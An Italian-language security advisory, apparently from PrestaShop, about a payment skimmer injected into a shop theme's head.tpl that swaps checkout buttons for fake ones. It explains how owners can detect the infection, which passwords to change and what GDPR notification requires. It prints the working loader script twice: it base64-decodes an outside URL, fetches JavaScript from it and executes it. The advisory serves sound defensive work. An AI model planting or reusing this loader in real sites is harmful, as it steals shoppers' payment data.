Abbiamo recentemente identificato una minaccia alla sicurezza che colpisce alcuni negozi online dell’ecosistema PrestaShop. È stato rilevato uno script dannoso ("digital skimmer") che potrebbe aver causato il furto delle informazioni di pagamento di alcuni vostri clienti.
Cosa fa questo digital skimmer?
Questo malware funziona sostituendo i pulsanti di pagamento legittimi sulla pagina di checkout con pulsanti fraudolenti. Quando un cliente clicca su uno di questi falsi pulsanti, viene reindirizzato verso un modulo di pagamento contraffatto progettato per catturare le sue informazioni di pagamento.
Lo skimmer viene semplicemente caricato tramite un tag <script>, scritto direttamente nel file _partials/head.tpl del tema attivo del negozio. Ciò significa che l’attaccante è riuscito a modificare un file del negozio.
Come verificare se il mio negozio è stato colpito?
Nel front-office
Puoi controllare il codice del tuo front-office ispezionando una pagina del tuo sito (clic destro, poi "ispeziona").
Guarda all’interno del tag <script>, se trovi il seguente codice, significa che il tuo negozio è stato colpito:
<script>(function(){var x=new XMLHttpRequest;x.open('GET',atob('aHR0cHM6Ly9wbHZiLnN1L2J0Lmpz'));x.onload=function(){if(200===x.status)try{Function(x.responseText)()}catch(e){}};x.send();})();</script>
Nota: la parte aHR0cHM6Ly9wbHZiLnN1L2J0Lmpz cambia ogni volta, ma la struttura del codice rimane la stessa, e la funzione atob() viene sempre utilizzata. Potrebbero esserci del codice prima o dopo (lo skimmer cerca di nascondersi risultando leggermente diverso su ogni negozio).
Sul tuo server
Se preferisci controllare i tuoi file, puoi trovare lo stesso tag script in un file sul tuo server.
Collegati al tuo server tramite FTP poi naviga nella cartella theme poi nella cartella del tema attivo > cartella template > _partial > head.tpl Su quest’ultimo file, fai clic destro poi "visualizza/modifica", e cerca lo stesso tag:
<script>(function(){var x=new XMLHttpRequest;x.open('GET',atob('aHR0cHM6Ly9wbHZiLnN1L2J0Lmpz'));x.onload=function(){if(200===x.status)try{Function(x.responseText)()}catch(e){}};x.send();})();</script>
Cosa fare se il mio negozio è interessato?
Cambia le password per i tuoi diversi accessi (back-office, database, FTP, SSH, senza dimenticare di aggiornare l’accesso al database nel file di configurazione di PrestaShop).
Se hai dubbi sulla sicurezza del tuo negozio, contatta la tua agenzia o il supporto PrestaShop.
Devo avvisare i miei clienti?
In qualità di titolari del trattamento dei dati ai sensi del GDPR, è vostra responsabilità valutare se si sia verificata una violazione dei dati e, in tal caso, effettuare le notifiche richieste. Ai sensi degli articoli 33 e 34 del GDPR, qualsiasi violazione che possa comportare un rischio per i diritti e le libertà deve essere segnalata all'autorità di controllo competente entro 72 ore e alle persone interessate in caso di rischio elevato (contattare l'autorità competente per la protezione dei dati nel proprio paese).
| ⚠️ A questo punto, vi raccomandiamo vivamente di effettuare una verifica completa della sicurezza dei vostri negozi PrestaShop e di assicurarvi che nessuno di essi sia stato compromesso. |